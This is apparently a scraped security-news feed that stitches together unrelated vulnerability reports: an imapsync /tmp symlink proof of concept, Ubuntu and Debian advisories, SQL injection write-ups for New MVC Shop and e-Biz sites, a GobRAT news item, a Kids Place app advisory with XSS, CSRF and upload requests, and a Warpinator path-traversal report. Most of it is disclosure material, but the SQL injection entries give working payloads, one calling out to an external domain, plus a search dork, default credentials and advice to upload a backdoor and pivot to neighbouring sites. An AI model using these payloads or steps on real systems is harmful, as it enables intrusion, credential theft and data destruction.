imapsync through 2.229 uses predictable paths under /tmp and /var/tmp in its default mode of operation. Both of these are typically world-writable, and thus (for example) an attacker can modify imapsync's cache and overwrite files belonging to the user who runs it.

I was running imapsync recently and noticed this flag description,

      --pidfile      str  : The file where imapsync pid is written,
                            it can be dirname/filename complete path.
                            The default name is imapsync.pid in tmpdir.
    

This was a red flag because using predictable filenames under /tmp is a well-known source of vulnerabilities: https://owasp.org/www-community/vulnerabilities/Insecure\_Temporary\_File

In this case, I verified that (with the default options), imapsync can be tricked into overwriting files belonging to other users. The simplest proof-of-concept uses a symlink. Newer linux distributions enable a sysctl to protect against this specific attack, but the example should still work on a vanilla kernel or on other UNIX systems, and more complicated attacks (not involving a symlink) are possible.

If you're on linux, start by ensuring that the aforementioned sysctl is disabled:

    root # sysctl fs.protected_symlinks=0
    

Now, as a normal user, create a symlink from /tmp/imapsync.pid to /etc/passwd:

    mjo $ ln -s /etc/passwd /tmp/imapsync.pid
    

This works because /tmp is world-writable. Anyone can create a file, directory, or symlink at that location before imapsync tries to use it. Now, run imapsync as root:

    root # imapsync <whatever>
    

You'll find that /etc/passwd, belonging to root, has essentially been deleted by the unprivileged user. Most file operations will follow a symlink, and in this case, the PID file was written to /etc/passwd.

The fundamental issue is that /tmp is world-writable by design which leads to all sorts of exploits like this. There are a lot of complicated and clever workarounds needed to make using /tmp (or /var/tmp) secure. In C, there are standard functions like mkstemp() that will create a temporary file securely. I'm not much of a perl programmer, but I believe File::Temp does the same thing in perl.

The imapsync_cache directory has the same issue; I can create it before you run imapsync and then I'm allowed to modify your cache. And while I haven't tried it, I would expect that $CGI_TMPDIR_TOP and $CGI_HASHFILE have a similar fate.

CVE-2023-34204: Secure /tmp usage · Issue #399 · imapsync/imapsync

Ubuntu Security Notice 6097-1 - It was discovered that Linux PTP did not properly perform a length check when forwarding a PTP message between ports. A remote attacker could possibly use this issue to access sensitive information, execute arbitrary code, or cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6097-1May 29, 2023linuxptp vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Linux PTP could be made to crash, run arbitrary code, or exposesensitive information if it received specially crafted input.Software Description:- linuxptp: Precision Time Protocol (PTP, IEEE1588) implementation for LinuxDetails:It was discovered that Linux PTP did not properly perform a length check when forwarding a PTP message between ports. A remote attacker could possibly use this issue to access sensitive information, execute arbitrary code, or cause a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:linuxptp 1.9.2-1ubuntu0.1Ubuntu 18.04 LTS:linuxptp 1.8-1ubuntu0.1Ubuntu 16.04 LTS (Available with Ubuntu Pro):linuxptp 1.6-1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6097-1CVE-2021-3570Package Information:https://launchpad.net/ubuntu/+source/linuxptp/1.9.2-1ubuntu0.1https://launchpad.net/ubuntu/+source/linuxptp/1.8-1ubuntu0.1

Ubuntu Security Notice USN-6097-1

Debian Linux Security Advisory 5415-1 - Two security issues were discovered in LibreOffice, which could potentially result in the execution of arbitrary code when loading a malformed spreadsheet document or unacknowledged loading of linked documents within a floating frame.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5415-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 28, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libreofficeCVE ID         : CVE-2023-0950 CVE-2023-2255Two security issues were discocvered in LibreOffice, which couldpotentially result in the execution of arbitrary code when loading amalformed spreadsheet document or unacknowlegded loading of linkeddocuments within a floating frame.For the stable distribution (bullseye), these problems have been fixed inversion 1:7.0.4-4+deb11u7.We recommend that you upgrade your libreoffice packages.For the detailed security status of libreoffice please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libreofficeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRzchEACgkQEMKTtsN8TjbRrRAAh/7Ahy9I1prBZqnkRKL3JubDmB7+ni9lK1Jmw0wRGVEBFiFOL6wmJXNiHeqXwx/mNv0/PBZGBNsicKAtftv9ixWfWumBKZSWEfPF9wVDwYGBF6xgC8adCcHk4PZ+/DhuNmGoeTJt6FokhkD/AiATR4IhJJLVUwexZV4jMTRyK85JJ4fTkjZnWgk+OkhHMEBMnAIqjWvpS5HapkTuqBvkzNS9+CgZgi03hcSCCdOP4ioGCQt6pHMrpZ0PyOyJukKOR3FO7YMV1U93dcH7wBrMMRilhH6CAXlAVhQz+48A9sXpZN44zYDdEWv6PNrMNhscLXH2bP1JFB2QGh43dMwt+C5VLlWU1BEWHndVE4Juiq5gkBbfCiENXbjSjxt61f1ZxqlMWBGirgePk9p1y0oZj3E0PKgxo8ViCU5ReaRw2LglGzLR+6bgeav52Zk5nJfKQThGKRWbhncXkF0exVtaaJIVw7NGjzPPZqGsIin/XySxBVIljzP1bPi/cW3oW2t81e5uL6ffWM37sM1K0H2E5CQRNvAr0S2L+5AeJa3f1qmzN00pwnmGdLnV/xA0hftn4NWRtdoFbnPTclpyOVH5M3P4D58NY9Hbc+VAQhViWAdt05HnKtKlxU/zq3Sn+qo9IVAtjaD+DiRuhZfXKNaLbP8apQoISsjZnemH0X+HQVM57e-----END PGP SIGNATURE-----

Debian Security Advisory 5415-1

Debian Linux Security Advisory 5412-1 - Several vulnerabilities were discovered in libraw, a library for reading RAW files obtained from digital photo cameras, which may result in denial of service or the execution of arbitrary code if specially crafted files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5412-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librawCVE ID         : CVE-2021-32142 CVE-2023-1729Debian Bug     : 1031790 1036281Several vulnerabilities were discovered in libraw, a library for readingRAW files obtained from digital photo cameras, which may result indenial of service or the execution of arbitrary code if speciallycrafted files are processed.For the stable distribution (bullseye), these problems have been fixed inversion 0.20.2-1+deb11u1.We recommend that you upgrade your libraw packages.For the detailed security status of libraw please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librawFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRyXNFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S6ehAAlIVUex5cV2eOg9y4Z4MrXPPEl7DPhsEItBnU6tA0PQLxImblhRY2+bruFw7S3ovXQxOJQRW3CQ7ykRenfERuZXvENJwbauwD4XFAFPOHcs0lEkdAumQ4pEnxczetY/GXvXVqZ5L2LD8SDLrPLO37u5JNZGclVHn+2OkzSPm3rMwvXXPy0uik6PG1dlJBTbAeTm8bCls+TEvcCD3M1EgwqcJ4Cemnd43R4BvLsd8FJWWB41XrbvEtt5s644k3eJ19EkjYJ/lfi2Uu2b6m1crdFt1DSFl1UlGaMWL/Jz+R8OzAYenlY7RRXzZOsMSPlt4B4TUC1AG0WgeZhec4StNDhdQyNZ4ild/2yUqR0cdMLWIHs1Lst+Yr4sKO4BAe75otA93nV49bicwgA+8Sb4nehLZAIm+dUbc+6SmqwntHsfZpSyWTt4FuAH6dM8R6hOAXkQ7DI9x9eod1NLH0FXqcl61qAKrfs348Rd4vPZY5TCndxvSJDuyynDFs9GrYKgN0mN/2ePAgj2Y7CvfUnkoVwK9AeQRETkSLzTwivT+XBc2RUaYRohGARp7DXnoEhtvLUx1Efr1LKXNizT958kpBPvTp3fVf6iP/fW9VtZudbvQb2wBrF7iDe/r4PX2OoYXdbm5qiV7wU20M+YQwZqIva95FQkKxdtPfnYzAWpWMa8g¿zv-----END PGP SIGNATURE-----

Debian Security Advisory 5412-1

Debian Linux Security Advisory 5414-1 - Jose Gomez discovered that the Catalog API endpoint in the Docker registry implementation did not sufficiently enforce limits, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5414-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : docker-registryCVE ID         : CVE-2023-2253Debian Bug     : 1035956Jose Gomez discovered that the Catalog API endpoint in the Dockerregistry implementation did not sufficiently enforce limits, whichcould result in denial of service.For the stable distribution (bullseye), this problem has been fixed inversion 2.7.1+ds2-7+deb11u1.We recommend that you upgrade your docker-registry packages.For the detailed security status of docker-registry please refer toits security tracker page at:https://security-tracker.debian.org/tracker/docker-registryFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRx4msACgkQEMKTtsN8TjZ7fw/9E+dbZBJfuAwWXfAdwAuSE+6aN2Ddqb956wFeT0K+sMaEzhnDthATuJx0cR8K9TfVOcSUbn7bhi/fDxlWMoUL+wN14MxwphZ2udEAgkv052bz97/vAU2bcGNuye081BQWgbdpxm4Y5ioVSyze0y9uixKkBA6grnc9DQoEZz/4cqifxJh5itwFi/AC5TuNzZk4HY7kDrRf/OLZZpZFNloNP9G535FxEdmjR3jTd6scSbEnwmXmuUPUQwo6IfrCLnPRVXY0Vn2Pphb8fK1vsYZrWQpzvBHr4UO/z8F14Pl1AVqQNh0Oct5y/oDhY4MN8n9e5Zsx4lunBczhOS8fGy0gU2ZLK12KTLeTdA1TSZMV6MrkFdYAiWDI6+qP7f8LQi4m1h2HqJX9nm50eEjZ4lfwtK0Xwb0YQEkadpnknbdQM1zkojblFZOjQqq8GQwQQYD+XfIRThZWLz3vA9RhE1MH0/p5JNxfQmm2VG7xdtBdWV5PRtnUtC9KoYQ4wyJjE4AxRbbVbVGoyuoQOCEmMt+MYp68aYjHQD6szT9aGNpyxKdncjHVAVQGdb4cYPAi3m0uObQKsy0q6tDXu+8BhZDoFaFlyy9AtFjPL0mE36FTiLxOmkkJ0Xi4fNlu4Ghq2yiX/lK+xuXjQ+D7SVu6KEuKg8p7ATxIh5k2AmSh6bO7Gz8=vOWz-----END PGP SIGNATURE-----

Debian Security Advisory 5414-1

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

It appears that sites designed by e-Biz Technocrats Pvt.Ltd suffer from a remote SQL injection vulnerability. As they do not provide any sort of versioning with their offerings, the researcher was unable to provide affected versions. Versions as of May 11, 2023 were affected.

    # Exploit Title: Sql Injection on one site credentials can be use on other sites- Google Dork:" Designed and Developed by e-Biz Technocrats Pvt.Ltd "- Date: 05/11/2023- Exploit Author: K1LL3rB4LL- Tested on: Mac, Windows, LinuxDescription:The vulnerability found is an SQL injection. You may run the site thru automated sql injection or manually doing sql injection once the credentials gathered you do your reverse ip to check your other website.Vuln colum count: 5Vuln colum : 3,4Type of Sql : WAFUsername: adminPassword: 123456admin panel: site.com/adminDetails: After gathering information from sql injection from site a site (site A) you may use the said credentials to access other websites on the same ip or with the same developer if you managed to get an access and upload a php script or backdoor. You may access other sites on their public_html or that is connected on their website which share the same server and if your going to look at the sites they share the same common developer. In some sites that don't have the same credentials you still do the same sql injection with the same colum count, vuln colum number and database where they store the admin credentials.

e-Biz Technocrats Pvt.Ltd SQL Injection

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT.
"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.
The compromise of an internet-exposed router is followed by the

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called **GobRAT**.

"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.

The compromise of an internet-exposed router is followed by the deployment of a loader script that acts as a conduit for delivering GobRAT, which, when launched, masquerades as the Apache daemon process (apached) to evade detection.

The loader is also equipped to disable firewalls, establish persistence using the cron job scheduler, and register an SSH public key in the .ssh/authorized\_keys file for remote access.

GobRAT, for its part, communicates with a remote server via the Transport Layer Security (TLS) protocol to receive as many as 22 different encrypted commands for execution.

Some of the major commands are as follows -

*   Obtain machine information
*   Execute reverse shell
*   Read/write files
*   Configure new command-and-control (C2) and protocol
*   Start SOCKS5 proxy
*   Execute file in /zone/frpc, and
*   Attempt to login to sshd, Telnet, Redis, MySQL, PostgreSQL services running on another machine

The findings come nearly three months after Lumen Black Lotus Labs revealed that business-grade routers have been victimized to spy on victims in Latin America, Europe, and North America using a malware called HiatusRAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New GobRAT Remote Access Trojan Targeting Linux Routers in Japan

An issue was discovered in the Kiddoware Kids Place Parental Control application before 3.8.50 for Android. The child can remove all restrictions temporarily without the parents noticing by rebooting into Android Safe Mode and disabling the "Display over other apps" permission.

Multiple vulnerabilities have been identified in the Kiddoware Kids Place Parental Control Android App. Users of the parent's web dashboard can be attacked via cross site scripting or cross site request forgery vulnerabilities, or attackers may upload arbitrary files to the children's devices. Furthermore, children are able to bypass any restrictions without the parents noticing.

**Vendor description**

"_Kiddoware is the world’s leading parental control solutions company with a wide range of products and  serving over 5 million families worldwide. Kiddoware is committed in helping you to protect your kids while providing you intelligence to be proactive about your childs’ online activities._"

Source: https://kiddoware.com/

**Business recommendation**

The vendor provides an update for the affected version(s) which should be installed immediately.

An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues.

The issues identified in this application were part of our blog post "The hidden costs of parental control apps" published a few months ago:  
https://r.sec-consult.com/parents

**Vulnerability overview/description****1) Login and registration returns password as MD5 hash**

Login and registration requests return the unsalted MD5 hash of the password. This indicates that the passwords are stored in an insecure format at the server. Furthermore, MD5 hashing should not be used anymore in modern applications.

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)**

The customizable name of the child's device can be used to trigger a XSS payload in the parent web dashboard. Children might be able to attack their parents' account.

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

All requests in the web dashboard are vulnerable to CSRF attacks. The requests contain the device Id of the child device which must be known to the attacker in order to successfully attack a child. But the device Id is not considered a secret, as it is used in the URL in some requests. An attacker could have obtained the Id through the browser history.

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents send files to the child's device. The selected file is uploaded to an AWS S3 bucket and the returned URL will be transmitted to the device which will then download it. It is possible to send arbitrary files to the child's device and thereby upload arbitrary files (size restriction ~10MB) to the AWS S3 bucket. The returned link is publicly available, so it is possible to use the server to spread malware.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can remove all restrictions temporarily without the parents noticing.

**Proof of concept****1) Login and registration returns password as MD5 hash**

The "Change password" request looks as follows:

    POST /account/change_password/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    [...]
    
    old_password=c869123c&new_password=password&confirm_password=password

The response from the web server contains the hashed, unsalted password:

    {
    	"error":null,
    	"result":
    		{
    			"email":"xxxxx@example.com",
    			"hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",
    			"message":"Password successfully changed!"
    		},
    	"status":200
    } 

Proving this is an unsalted MD5 hash:

    $ echo -n "password" | md5sum -t
    5f4dcc3b5aa765d61d8327deb882cf99  -

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079) **

The device name can be changed by the child's account by sending a POST request to the API with the pushDeviceConfig method. The following payload can be used as a PoC to trigger an alert box on every page the device name is visible in the parent dashboard. Children/attackers would be able to take over their parents' accounts via this attack.

    POST /v2/api/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Content-Type: application/json; charset=utf-8
    Content-Length: 461
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.12.8
    Connection: close
    
    {
        "method":"pushDeviceConfig",
        "id":null,
        "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",
        {
            "isGPSEnabled":false,"deviceGCMRegID":"",
            "deviceUserAgeRange":3,
            "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",
            [...]
        }
    } 

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

As an example, an attacker can abuse the CSRF vulnerability to download an arbitrary file to a child's device. It is simply needed to create a form which automatically submits on page load. If a parent is logged in the web dashboard and visits  this malicious site, the authenticated request will be sent and the file specified in the URL parameter will be downloaded by the child's device.

    POST /account/push_content/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 75
    Connection: close
    
    url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX  

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket and push it to the child device.

    POST /account/push_content_file/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 296
    [...]
    
    -----------------------------27687116714103572458683268551
    Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"
    Content-Type: text/plain
    
    <eicar-file>
    -----------------------------27687116714103572458683268551--

The upload of the eicar file worked without errors and could subsequently also be downloaded  via the returned link. So there is no antivirus scan on the uploaded files.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can disable the restrictions of the application without the parents noticing.  
For this, the following steps are necessary:  
a) If Android settings are blocked, reboot into Android Safe Mode.  
b) Disable "Display over other apps" Permission for the app in Android settings.  
c) After rebooting into normal mode, the child device can be used without restrictions. 

For example, previously locked apps can now be used. To notice the problem, the parent has to check the parent's dashboard manually, a notification is not sent. If the child turns the permission back on in the meantime, the bypass will go unnoticed.

**Vulnerable / tested versions**

The following version has been tested and downloaded through Google Play store, which was the most recent version available at the time of the test:

*   3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

**Vendor contact timeline**

CVE-2023-28153: Multiple Vulnerabilities in Kiddoware Kids Place Parental Control Android App

Warpinator before 1.6.0 allows remote file deletion via directory traversal in top_dir_basenames.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 26 Apr 2023 11:54:38 +0200
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: Warpinator: Remote file deletion vulnerability (CVE-2023-29380)

Hi list,

this report is about a remote file deletion vulnerability in Warpinator
\[1\].

Introduction
============

I already reviewed and found issues in Warpinator a while ago \[2\]. The
openSUSE packager for Warpinator asked me for a follow-up review after
updating to upstream release 1.4.3 which contained the fixes for
CVE-2022-42725.

In the course of the review I found another vulnerability which is
described in detail in the next section.

The Vulnerability
=================

In the code base of version 1.4.3 the sender of a file also sends a list
of \`top\_dir\_basenames\` to the peer. While there is now a verification of
the \`relative\_path\` on the receiving side, the \`top\_dir\_basenames\` are
not verified at all. In \`FileReceiver.\_\_init\_\_()\` the following code is
found:

\`\`\`
    for name in op.top\_dir\_basenames:
        try:
            path = os.path.join(self.save\_path, name)
            if os.path.isdir(path): # file not found is ok
                shutil.rmtree(path)
            else:
                os.remove(path)
        except FileNotFoundError:
            pass
        except Exception as e:
            logging.warning("Problem removing existing files.  Transfer may not succeed: %s" % e)
\`\`\`

If the sender is passing a string like "../" as part of
\`top\_dir\_basenames\` then this code will delete the complete parent
directory of the download directory (by default ~/Warpinator) and thus
the complete home directory of the receiving party. Any other files
under control of the receiving party are similarly endangered by this
remote DoS / integrity attack.

This can happen automatically if the receiving side is running
Warpinator in trusted mode, both parties share the same non-default
group key and unconfirmed file overwrites are allowed. If this is not
the case then the receiving side will see a confirmation popup like

    X wants to send \`../´

This message might not be very suspecting for an average end user. Other
strings can be used here as well like an absolute path to the user's
home directory, which could be interpreted as correct, or overlooked.

I investigated whether the fact that this allows to delete the download
directory completely could lead to a follow-up vulnerability to allow
overwriting files in other paths again. This seems not to be possible
though.  The check of the \`relative\_path()\` is stable enough to prevent
this even if the download directory does not exist at all.

Affectedness
============

The problematic handling of \`top\_dir\_basenames\` was first introduced in
upstream version 1.0.7.

Bugfixes
========

The remote file deletion vulnerability has been fixed upstream via
commit 9aae768 \[3\].

The fact that this vulnerability escaped both upstream's and my own
review efforts during handling of CVE-2022-4272 confirmed earlier
concerns I had about relying on a single line of defense in the
Warpinator codebase. I recommended to upstream to use an isolation
technique like Linux mount namespaces to prevent escapes from the
destined download directory. In the light of this new security issue I
additionally or alternatively recommended a redesign of the codebase to
better separate trusted and untrusted codepaths.

Upstream used the 90 days embargo time we offered to implement isolation
mechanisms either based on Linux namespaces through the Bubblewrap tool,
or based on the Linux kernel's landlock security module. Only if none of
both can be established, Warpinator will run in a legacy mode. In
this case the user will be warned about the weakened security.

The new Warpinator major version release 1.6.0 contains both the bugfix
for this the remote file deletion issue as well as the added security
layers.

Timeline
========

2023-01-25: I reported the newly found issue to upstream and offered
            coordinated disclosure.
2023-03-08: Upstream shared the core changes listed above with us, I
            reviewed them and gave feedback.
2023-04-05: I received CVE-2023-29380 from Mitre to track the file
            deletion issue and shared it with upstream.
2023-04-25: Upstream needed additional time for testing and integration.
            The 90 days maximum embargo period we offer ends and with
	    the 1.6.0 release being available we agreed on the
	    publication of all available information.

References
==========

\[1\]: https://github.com/linuxmint/warpinator
\[2\]: https://seclists.org/oss-sec/2022/q4/38
\[3\]: https://github.com/linuxmint/warpinator/commit/9aae768522b7bbb09c836419893802a02221d663

Best Regards

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Security Engineer
https://www.suse.com/security
GPG Key ID: 0x14C405C971923553
 
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (834 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

Tag

#linux